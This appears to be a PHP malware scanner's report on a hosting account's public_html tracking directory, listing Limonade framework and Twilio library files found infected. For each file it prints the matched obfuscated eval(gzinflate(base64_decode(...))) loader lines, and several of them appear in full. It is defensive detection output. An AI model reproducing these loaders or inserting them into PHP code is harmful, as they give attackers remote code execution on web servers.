Report

Version: 0.14.0
Scan date: 2024-06-13 00:59:16
Files analyzed: 2577 | Files infected: 282

/custdata01/kings/public_html/tracking/api/limonade/views/_debug.html.php

Size: 663.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAL2TXU/CMBSGrzXxPxwLgS2RLHCnjC5RuPAGjFFvCFnGVlgjtE1XiCb+eNsNtmL4SoxmN2c97zl9zkeBzhwuFOXMaRK2brqAYTB8C5+eR/3Xh5fH0RAaDdgqEjJdzZuuewcBvroE8AORCtAprus0C1OlREik5LISCDwuRCROOeTOUH0K4tS1zbgb4InRXVgi48mUDDA4lIGvTc7m+IdgRhckwL638cKCMnJIa3yW1i0u9AS2b2YJnXVzavNZpdXzosNIzjPoQUaU0wwXdGkKDSuX3ZS0AzTpodzZ0s7VkjCVIdw3B1Ae+F7a2SAISbAf84TY6KkjJGUqlDbCDSi5Iq5r6ikCPBNcEVuFANg4mpmzKCGtYpiaZ1QYZWNKoFM8m3Vwj8EIiBdRlvXQVIHiAmE/glSSWQ/VUqIxJMJjaNQ+Ou3bdhcmvhfh7Uhsar2TVMOZhiE8qH7OZtUJ/gW0mPY0it+VjGKC8P3WPBu...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAL2TXU/CMBSGrzXxPxwLgS2RLHCnjC5RuPAGjFFvCFnGVlgjtE1XiCb+eNsNtmL4SoxmN2c97zl9zkeBzhwuFOXMaRK2brqAYTB8C5+eR/3Xh5fH0RAaDdgqEjJdzZuuewcBvroE8AORCtAprus0C1OlREik5LISCDwuRCROOeTOUH0K4tS1zbgb4InRXVgi48mUDDA4lIGvTc7m+IdgRhckwL638cKCMnJIa3yW1i0u9AS2b2YJnXVzavNZpdXzosNIzjPoQUaU0wwXdGkKDSuX3ZS0AzTpodzZ0s7VkjCVIdw3B1Ae+F7a2SAISbAf84TY6KkjJGUqlDbCDSi5Iq5r6ikCPBNcEVuFANg4mpmzKCGtYpiaZ1QYZWNKoFM8m3Vwj8EIiBdRlvXQVIHiAmE/glSSWQ/VUqIxJMJjaNQ+Ou3bdhcmvhfh7Uhsar2TVMO...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAL2TXU/CMBSGrzXxPxwLgS2RLHCnjC5RuPAGjFFvCFnGVlgjtE1XiCb+eNsNtmL4SoxmN2c97zl9zkeBzhwuFOXMaRK2brqAYTB8C5+eR/3Xh5fH0RAaDdgqEjJdzZuuewcBvroE8AORCtAprus0C1OlREik5LISCDwuRCROOeTOUH0K4tS1zbgb4InRXVgi48mUDDA4lIGvTc7m+IdgRhckwL638cKCMnJIa3yW1i0u9AS2b2YJnXVzavNZpdXzosNIzjPoQUaU0wwXdGkKDSuX3ZS0AzTpodzZ0s7VkjCVIdw3B1Ae+F7a2SAISbAf84TY6KkjJGUqlDbCDSi5Iq5r6ikCPBNcEVuFANg4mpmzKCGtYpiaZ1QYZWNKoFM8m3Vwj8EIiBdRlvXQVIHiAmE/glSSWQ/VUqIxJMJjaNQ+Ou3bdhcmvhfh7Uhsar2TVMO...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/api/limonade/views/_notices.html.php

Size: 431.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAI1RS07DMBTcI3GHoVSkUUWsVmwgrnMDLlBFKNhOYim1I9t8envs2oUuQGL1RvbMvNE8qH51Iw+zP66W2njFpSvLJzTs+ooK9Q4+dc7tFpM63Av5+jYgokxcBBJAxweGu9vP7eZxW+M5faHTAh+d1UoPjpJAOVHFlGYzjzOWfPbYYVOjN1Z2fPxOgM4h45wFiGrP9kkq+WhO+qqoUFTSWmNf/HGWZ4t9Ed60KdqyYS0lQXn2EGd0YXShcd4WbcOgNGjARg+MciMk+4Pfq0lGASWJRbIIacuktPyfUWT+ZpTTkhz8p7r1uobUIndX55oCMXc82nhDEo4YZ1qqheprfAGqhlM/9AEAAA=='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1RS07DMBTcI3GHoVSkUUWsVmwgrnMDLlBFKNhOYim1I9t8envs2oUuQGL1RvbMvNE8qH51Iw+zP66W2njFpSvLJzTs+ooK9Q4+dc7tFpM63Av5+jYgokxcBBJAxweGu9vP7eZxW+M5faHTAh+d1UoPjpJAOVHFlGYzjzOWfPbYYVOjN1Z2fPxOgM4h45wFiGrP9kkq+WhO+qqoUFTSWmNf/HGWZ4t9Ed60KdqyYS0lQXn2EGd0YXShcd4WbcOgNGjARg+MciMk+4Pfq0lGASWJRbIIacuktPyfUWT+ZpTTkhz8p7r1uobUIndX55oCMXc82nhDEo4YZ1qqheprfAGqhlM/9AEAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAI1RS07DMBTcI3GHoVSkUUWsVmwgrnMDLlBFKNhOYim1I9t8envs2oUuQGL1RvbMvNE8qH51Iw+zP66W2njFpSvLJzTs+ooK9Q4+dc7tFpM63Av5+jYgokxcBBJAxweGu9vP7eZxW+M5faHTAh+d1UoPjpJAOVHFlGYzjzOWfPbYYVOjN1Z2fPxOgM4h45wFiGrP9kkq+WhO+qqoUFTSWmNf/HGWZ4t9Ed60KdqyYS0lQXn2EGd0YXShcd4WbcOgNGjARg+MciMk+4Pfq0lGASWJRbIIacuktPyfUWT+ZpTTkhz8p7r1uobUIndX55oCMXc82nhDEo4YZ1qqheprfAGqhlM/9AEAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/api/limonade/views/default_layout.php

Size: 499.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAFVRsU7DMBCdQeIfDguprUSIuiHFaYaCxIBEhy5MkXEuslU7Dva1kH49TpoEdbrz3XvP79n8/uVju//cvYIiazZ3t3yuKKpYb7hFEnFLbYLfR33K2dY1hA0l+65FBvJyyhnhL6U9OwOphA9I+ZHq5JkNKqTJ4OZdW9eICh+BFEKtz+cOdm87sFp6l9ReWPxx/sDTC7wnGt0cwKPJWaDOYFCIxEB5rHPGi1a1gFI5OHpT1s4vF2lptC1lCGmQHrF5iu1ilRUbBhQNjz7jkIHFSouoO+B6mzwdU/MvV3WxAvBKn0BXOes36NkwjGO1nsNE1vqCTSN46K6Y4wvN1H/T6L3zZeNISwylxybesFxlUEzQScIK3Uz8K4WHUTwr/rfKgzQihJisFRLne2d3U9cHHoPydPz3P5/oIFkRAgAA'

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAFVRsU7DMBCdQeIfDguprUSIuiHFaYaCxIBEhy5MkXEuslU7Dva1kH49TpoEdbrz3XvP79n8/uVju//cvYIiazZ3t3yuKKpYb7hFEnFLbYLfR33K2dY1hA0l+65FBvJyyhnhL6U9OwOphA9I+ZHq5JkNKqTJ4OZdW9eICh+BFEKtz+cOdm87sFp6l9ReWPxx/sDTC7wnGt0cwKPJWaDOYFCIxEB5rHPGi1a1gFI5OHpT1s4vF2lptC1lCGmQHrF5iu1ilRUbBhQNjz7jkIHFSouoO+B6mzwdU/MvV3WxAvBKn0BXOes36NkwjGO1nsNE1vqCTSN46K6Y4wvN1H/T6L3zZeNISwylxybesFxlUEzQScIK3Uz8K4WHUTwr/rfKgzQihJisFRLne2d3U9cHHoPydPz3P5/oIFkRAgAA')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAFVRsU7DMBCdQeIfDguprUSIuiHFaYaCxIBEhy5MkXEuslU7Dva1kH49TpoEdbrz3XvP79n8/uVju//cvYIiazZ3t3yuKKpYb7hFEnFLbYLfR33K2dY1hA0l+65FBvJyyhnhL6U9OwOphA9I+ZHq5JkNKqTJ4OZdW9eICh+BFEKtz+cOdm87sFp6l9ReWPxx/sDTC7wnGt0cwKPJWaDOYFCIxEB5rHPGi1a1gFI5OHpT1s4vF2lptC1lCGmQHrF5iu1ilRUbBhQNjz7jkIHFSouoO+B6mzwdU/MvV3WxAvBKn0BXOes36NkwjGO1nsNE1vqCTSN46K6Y4wvN1H/T6L3zZeNISwylxybesFxlUEzQScIK3Uz8K4WHUTwr/rfKgzQihJisFRLne2d3U9cHHoPydPz3P5/oIFkRAgAA'),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/api/limonade/views/error.html.php

Size: 263.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:49 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAFWMwQ7CIBAF7yb+wx5ICklT41VI+RRSLXVJkJIF/H5BPNTrmzcDoPA6Kx0xgn3gDsgt0U4Gc44m5SWXxFmdwi6E1LO61Pv5BNAVt3HmUj9/PXED3Xn8r7ZGyiRaIh4KNqxukz/pMDcLqFJLfDCrvZfnhPnlp0qHEULxfgT2XigJCR+O7eA3xgAAAA==')

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAFWMwQ7CIBAF7yb+wx5ICklT41VI+RRSLXVJkJIF/H5BPNTrmzcDoPA6Kx0xgn3gDsgt0U4Gc44m5SWXxFmdwi6E1LO61Pv5BNAVt3HmUj9/PXED3Xn8r7ZGyiRaIh4KNqxukz/pMDcLqFJLfDCrvZfnhPnlp0qHEULxfgT2XigJCR+O7eA3xgAAAA=='),10,-8)))

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/api/limonade/abstract.php

Size: 1.90 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAN1YS2/bRhC+G9B/GKgGQhmEfI/7cJCgQC4O0CaHnOgVOTS3pnbZ3aUc1ch/78w+SD2hpFYPLWDIFHd3Ht83r9Xk4vrqanIBV/BmYZ0RpYMlukZXFlwj6It8aBwsEAxWWEuFFSzW0Fs0/tA7DUo7kKps+wrpiLRQyxbpDax1b0B03WuQDrRq1yDkksRq6IxeSdpe6bJfonLCSa28PLHQvSMx2iLUvSp5wc79kv+47UT5KB4QWrnUSlQY3tp+kRZEdIMXruljMjj43sGTbFt2phRtS548NajYQiCrW0HqGnqZCTYAaduDVFI9gK79d9OrwaRZMOmz7kmUgoAM6M6bS75b9k66HASUWin0h9hzAZVwYiHIvfncCwkOJKsjglHNKfRvDbreKFhpWUF0eDhLimv50BvMZpOLZ1qFsPtmcvF1cjHC8jZgQYSRh9kM/uitA1E7NGDRWhZlnTDsjCL1WGtDADZYPjI4Bv/s0aa...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1YS2/bRhC+G9B/GKgGQhmEfI/7cJCgQC4O0CaHnOgVOTS3pnbZ3aUc1ch/78w+SD2hpFYPLWDIFHd3Ht83r9Xk4vrqanIBV/BmYZ0RpYMlukZXFlwj6It8aBwsEAxWWEuFFSzW0Fs0/tA7DUo7kKps+wrpiLRQyxbpDax1b0B03WuQDrRq1yDkksRq6IxeSdpe6bJfonLCSa28PLHQvSMx2iLUvSp5wc79kv+47UT5KB4QWrnUSlQY3tp+kRZEdIMXruljMjj43sGTbFt2phRtS548NajYQiCrW0HqGnqZCTYAaduDVFI9gK79d9OrwaRZMOmz7kmUgoAM6M6bS75b9k66HASUWin0h9hzAZVwYiHIvfncCwkOJKsjglHNKfRvDbreKFhpWUF0eDhLimv50BvMZpOLZ1qFsPtmcvF1cjHC8jZgQYSRh9kM/uitA1E...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1YS2/bRhC+G9B/GKgGQhmEfI/7cJCgQC4O0CaHnOgVOTS3pnbZ3aUc1ch/78w+SD2hpFYPLWDIFHd3Ht83r9Xk4vrqanIBV/BmYZ0RpYMlukZXFlwj6It8aBwsEAxWWEuFFSzW0Fs0/tA7DUo7kKps+wrpiLRQyxbpDax1b0B03WuQDrRq1yDkksRq6IxeSdpe6bJfonLCSa28PLHQvSMx2iLUvSp5wc79kv+47UT5KB4QWrnUSlQY3tp+kRZEdIMXruljMjj43sGTbFt2phRtS548NajYQiCrW0HqGnqZCTYAaduDVFI9gK79d9OrwaRZMOmz7kmUgoAM6M6bS75b9k66HASUWin0h9hzAZVwYiHIvfncCwkOJKsjglHNKfRvDbreKFhpWUF0eDhLimv50BvMZpOLZ1qFsPtmcvF1cjHC8jZgQYSRh9kM/uitA1E...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/api/limonade/assertions.php

Size: 2.00 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEALVYbVPbRhD+zgz/4TBuJFEiBZJCICFpOk3azjChE8gnTDQn6WSrlXSK7gTJZPjv3b07ybIiE9lQf7Ctu3159tnd27M3N7ydnc0NskN+LWj4L50yIpmQQi+JKqhXqRCslAnP1Za3ubFNTh7wRbbRIrzenJ+//XDx19n7c3LP1/b/gXGz4UsT4suyYvhcc1jSjAhZJvmUjK9pWjHSt5MxIZBVvVcyWZU5CThPGc0Nv3GVh8h325GtTe7ODZwQ6+XeKyJmvEojEjBy8eHjW8vZ3PgGZojKpV9Wud+kz3ZeqB3jU6/blsGKUaKFF8TzLLf2giq3GHsXU0xTMQTUuzen5/dEpUwMhJVXaToA1fuPp6f3A4UWhmLiw3CB3P2xba2GjWWF/DqAMCW3Bqq2fWcFvgbhMoSti21rHXDsc0Uhk+xLwULJol0ygDtUIZKTl/uv1kls7QvqznhbhcgV8SKnDwZ4a0XAScRymYSrEty...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEALVYbVPbRhD+zgz/4TBuJFEiBZJCICFpOk3azjChE8gnTDQn6WSrlXSK7gTJZPjv3b07ybIiE9lQf7Ctu3159tnd27M3N7ydnc0NskN+LWj4L50yIpmQQi+JKqhXqRCslAnP1Za3ubFNTh7wRbbRIrzenJ+//XDx19n7c3LP1/b/gXGz4UsT4suyYvhcc1jSjAhZJvmUjK9pWjHSt5MxIZBVvVcyWZU5CThPGc0Nv3GVh8h325GtTe7ODZwQ6+XeKyJmvEojEjBy8eHjW8vZ3PgGZojKpV9Wud+kz3ZeqB3jU6/blsGKUaKFF8TzLLf2giq3GHsXU0xTMQTUuzen5/dEpUwMhJVXaToA1fuPp6f3A4UWhmLiw3CB3P2xba2GjWWF/DqAMCW3Bqq2fWcFvgbhMoSti21rHXDsc0Uhk+xLwULJol0ygDtUIZKTl/uv1kl...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEALVYbVPbRhD+zgz/4TBuJFEiBZJCICFpOk3azjChE8gnTDQn6WSrlXSK7gTJZPjv3b07ybIiE9lQf7Ctu3159tnd27M3N7ydnc0NskN+LWj4L50yIpmQQi+JKqhXqRCslAnP1Za3ubFNTh7wRbbRIrzenJ+//XDx19n7c3LP1/b/gXGz4UsT4suyYvhcc1jSjAhZJvmUjK9pWjHSt5MxIZBVvVcyWZU5CThPGc0Nv3GVh8h325GtTe7ODZwQ6+XeKyJmvEojEjBy8eHjW8vZ3PgGZojKpV9Wud+kz3ZeqB3jU6/blsGKUaKFF8TzLLf2giq3GHsXU0xTMQTUuzen5/dEpUwMhJVXaToA1fuPp6f3A4UWhmLiw3CB3P2xba2GjWWF/DqAMCW3Bqq2fWcFvgbhMoSti21rHXDsc0Uhk+xLwULJol0ygDtUIZKTl/uv1kl...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/api/limonade/tests.php

Size: 3.66 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAL1abXPbRg7+nMzkPyC0p6IcxXLau+uMc86dYtGppzrLlei0HTXh0OJK4oQieXxJnHP03wvsG5cS7Si2e8rEJnexWAALPABWfvK4u7f35DHswb9Tf/rBnzMoWF7kNNTFH08e78DRA35ghzjix3XG7hge4rPzV8j4RNslSvwA/DxnWREmsTJMxv5bhhnzknjKIAiz2F8y2/NOTgeO57X3rW61Yj9dpNZLYsntqfge41Thx0UOfhzAPEou/UhxD2f204DNwpgFdqs/brXbIF5tqz+2OtA/HTnH7nD0uzd2znujHj62+Q600M8y/7P3gX322FWIR2lbUbhMYj9guHL3zWD4ujcYt9u4FejXSUXzDo6As7CJZTNDchFv6ucsN1iaPG5hPzFXb70Zy7Iku/tucvk36eZNyyxjcXEvFTUT2vrsYjC4fd+8DIt7GFUuN/bC3eLQy1lhW0GYpxFuqk1ZZCUjO/ABL2Npgg4bz23...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAL1abXPbRg7+nMzkPyC0p6IcxXLau+uMc86dYtGppzrLlei0HTXh0OJK4oQieXxJnHP03wvsG5cS7Si2e8rEJnexWAALPABWfvK4u7f35DHswb9Tf/rBnzMoWF7kNNTFH08e78DRA35ghzjix3XG7hge4rPzV8j4RNslSvwA/DxnWREmsTJMxv5bhhnzknjKIAiz2F8y2/NOTgeO57X3rW61Yj9dpNZLYsntqfge41Thx0UOfhzAPEou/UhxD2f204DNwpgFdqs/brXbIF5tqz+2OtA/HTnH7nD0uzd2znujHj62+Q600M8y/7P3gX322FWIR2lbUbhMYj9guHL3zWD4ujcYt9u4FejXSUXzDo6As7CJZTNDchFv6ucsN1iaPG5hPzFXb70Zy7Iku/tucvk36eZNyyxjcXEvFTUT2vrsYjC4fd+8DIt7GFUuN/bC3eL...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAL1abXPbRg7+nMzkPyC0p6IcxXLau+uMc86dYtGppzrLlei0HTXh0OJK4oQieXxJnHP03wvsG5cS7Si2e8rEJnexWAALPABWfvK4u7f35DHswb9Tf/rBnzMoWF7kNNTFH08e78DRA35ghzjix3XG7hge4rPzV8j4RNslSvwA/DxnWREmsTJMxv5bhhnzknjKIAiz2F8y2/NOTgeO57X3rW61Yj9dpNZLYsntqfge41Thx0UOfhzAPEou/UhxD2f204DNwpgFdqs/brXbIF5tqz+2OtA/HTnH7nD0uzd2znujHj62+Q600M8y/7P3gX322FWIR2lbUbhMYj9guHL3zWD4ujcYt9u4FejXSUXzDo6As7CJZTNDchFv6ucsN1iaPG5hPzFXb70Zy7Iku/tucvk36eZNyyxjcXEvFTUT2vrsYjC4fd+8DIt7GFUuN/bC3eL...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/api/index.php

Size: 9.29 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 3
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09a1PbyLLfU5X/MFH5rO2swcA+7l5yTELASXwOwblAsrWHolSyLUAbYflKcgi7m/9+u+eleUqGsK9b0dlD5Jmenp6enp7unocePug/fviAPCY/xpNNskZ2907I7psRTdpa31jHtOPrpJxekjIjB8lVNo9mMTnPcjKJyzLOyTS7WkRlMknSpLzBcv2HD/L4f5dJHofZfBp32ikvtb64XLS7T8zs9fV+Mp+my1ncX5ZJ2gz1JrpI5lBlNpewycU8A9BlEedhNMnysoOpDx/0++QoW5ZxQfp3fDiW0XwWf3z4YJYU0NjpZXgRl512v91rA8OAX9vbCQK0Za2QRt7FeQFEWqW2o2V5WWbv43n/AwNR8IgUiWkP+TtP4qIOz1QAKZiqtApXlKb1eBCgz4vehMlMxYd5EtfJj6OD0Zjsvj15RU7G/x4e1qHFt5C+KviUxKqz4gV0Xi2JOQVRaexvF2WUl+EsKuP+djyf0Te...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a1PbyLLfU5X/MFH5rO2swcA+7l5yTELASXwOwblAsrWHolSyLUAbYflKcgi7m/9+u+eleUqGsK9b0dlD5Jmenp6enp7unocePug/fviAPCY/xpNNskZ2907I7psRTdpa31jHtOPrpJxekjIjB8lVNo9mMTnPcjKJyzLOyTS7WkRlMknSpLzBcv2HD/L4f5dJHofZfBp32ikvtb64XLS7T8zs9fV+Mp+my1ncX5ZJ2gz1JrpI5lBlNpewycU8A9BlEedhNMnysoOpDx/0++QoW5ZxQfp3fDiW0XwWf3z4YJYU0NjpZXgRl512v91rA8OAX9vbCQK0Za2QRt7FeQFEWqW2o2V5WWbv43n/AwNR8IgUiWkP+TtP4qIOz1QAKZiqtApXlKb1eBCgz4vehMlMxYd5EtfJj6OD0Zjsvj15RU7G/x4e1qHFt5C+KviUxKq...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a1PbyLLfU5X/MFH5rO2swcA+7l5yTELASXwOwblAsrWHolSyLUAbYflKcgi7m/9+u+eleUqGsK9b0dlD5Jmenp6enp7unocePug/fviAPCY/xpNNskZ2907I7psRTdpa31jHtOPrpJxekjIjB8lVNo9mMTnPcjKJyzLOyTS7WkRlMknSpLzBcv2HD/L4f5dJHofZfBp32ikvtb64XLS7T8zs9fV+Mp+my1ncX5ZJ2gz1JrpI5lBlNpewycU8A9BlEedhNMnysoOpDx/0++QoW5ZxQfp3fDiW0XwWf3z4YJYU0NjpZXgRl512v91rA8OAX9vbCQK0Za2QRt7FeQFEWqW2o2V5WWbv43n/AwNR8IgUiWkP+TtP4qIOz1QAKZiqtApXlKb1eBCgz4vehMlMxYd5EtfJj6OD0Zjsvj15RU7G/x4e1qHFt5C+KviUxKq...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

Sign d97f004d Line: 3 Dangerous

Malware Signature (hash: d97f004d)

<?php zdgF0

/custdata01/kings/public_html/tracking/api/limonade.php

Size: 26.06 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19a3cbN7Lg58w5/g+IrB2SDkU9bGcmcmSHkeiYO7Kk1SOZrEbD2yKbUo9JNsNu6pGM//vWC69uNEXFyWz2ntXcG0uNQqFQKBQKhULhyZ/UJ/88+dNTtfMb/qinT/705E/rz549+ZN6ptS+6qr36lAdqLbaUx36yCWROnp3pMZJf5aq4Swax7fp7EPLAXibztQ4ncUqmQzT2TjKk3SSbatfvhklkw/qOs+n2fb6+lWSX88vW/10vJ6lw2gQZ8nVZH2UjNMJ/PGRUfF/v4nm+TUgfRtdzpJ+rPbnsyiZxFLYT6f3s+TqOle75rd6v6G2Nja+qqgygk+TLCZagJR0Cn+l81k/bqWzq3UpzdbHSb4mf7Sm11N1eh2r991Ttc/fBNk06n+IrmKlScfP68jLpzBKa7/NDw74U8a4RC+XFSGN8bf70RiP4tk4yTIYeJVk6jqexZf36moWTfJ40ASpiWOVDlX/OppdxU2Vpyq...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19a3cbN7Lg58w5/g+IrB2SDkU9bGcmcmSHkeiYO7Kk1SOZrEbD2yKbUo9JNsNu6pGM//vWC69uNEXFyWz2ntXcG0uNQqFQKBQKhULhyZ/UJ/88+dNTtfMb/qinT/705E/rz549+ZN6ptS+6qr36lAdqLbaUx36yCWROnp3pMZJf5aq4Swax7fp7EPLAXibztQ4ncUqmQzT2TjKk3SSbatfvhklkw/qOs+n2fb6+lWSX88vW/10vJ6lw2gQZ8nVZH2UjNMJ/PGRUfF/v4nm+TUgfRtdzpJ+rPbnsyiZxFLYT6f3s+TqOle75rd6v6G2Nja+qqgygk+TLCZagJR0Cn+l81k/bqWzq3UpzdbHSb4mf7Sm11N1eh2r991Ttc/fBNk06n+IrmKlScfP68jLpzBKa7/NDw74U8a4RC+XFSGN8bf70RiP4tk4yTIYeJVk6jq...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19a3cbN7Lg58w5/g+IrB2SDkU9bGcmcmSHkeiYO7Kk1SOZrEbD2yKbUo9JNsNu6pGM//vWC69uNEXFyWz2ntXcG0uNQqFQKBQKhULhyZ/UJ/88+dNTtfMb/qinT/705E/rz549+ZN6ptS+6qr36lAdqLbaUx36yCWROnp3pMZJf5aq4Swax7fp7EPLAXibztQ4ncUqmQzT2TjKk3SSbatfvhklkw/qOs+n2fb6+lWSX88vW/10vJ6lw2gQZ8nVZH2UjNMJ/PGRUfF/v4nm+TUgfRtdzpJ+rPbnsyiZxFLYT6f3s+TqOle75rd6v6G2Nja+qqgygk+TLCZagJR0Cn+l81k/bqWzq3UpzdbHSb4mf7Sm11N1eh2r991Ttc/fBNk06n+IrmKlScfP68jLpzBKa7/NDw74U8a4RC+XFSGN8bf70RiP4tk4yTIYeJVk6jq...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Services/Twilio/Rest/Account.php

Size: 515.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAH1TQWoDMQy8B/YPPgQ2gbR9QGmhx16b3o1XVjYCR97achJa+vfaJCF014kwGDTDSGPJzayZgTMxqjWGPQFG/XkgR15/YBT9BuATi8KjINsp6Z2jGAbMZJ8CoPppsqDKMQQvCIJWbRKDkGdFTLKYgyNkWal5CrQsfHWOuWwpPrxGlDSsUxfOknFxpZRozTA4AlMkY7sag3tDznQO9bD1jJrTrsMw5fkkvSfuNRjnMGiyU06BKlnPGwyYTU8xYvC7onq/+A4tmUo2RtNXVNkLbW46HjmpGQkIPtjMmUJxF/XNwnHrg2jwtoJJMBwh0FDvKr8S5/HrPKzKkJJkZfpGq+/yUmlLn7q/hUqgvq898lfCVPNEQ3tNLZ8v+1risoGGbeeP6kUxHur/Yn2ijFbz326rR9U+nXmjiuX+bWb5/AH7JkYrfwMAAA=='

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

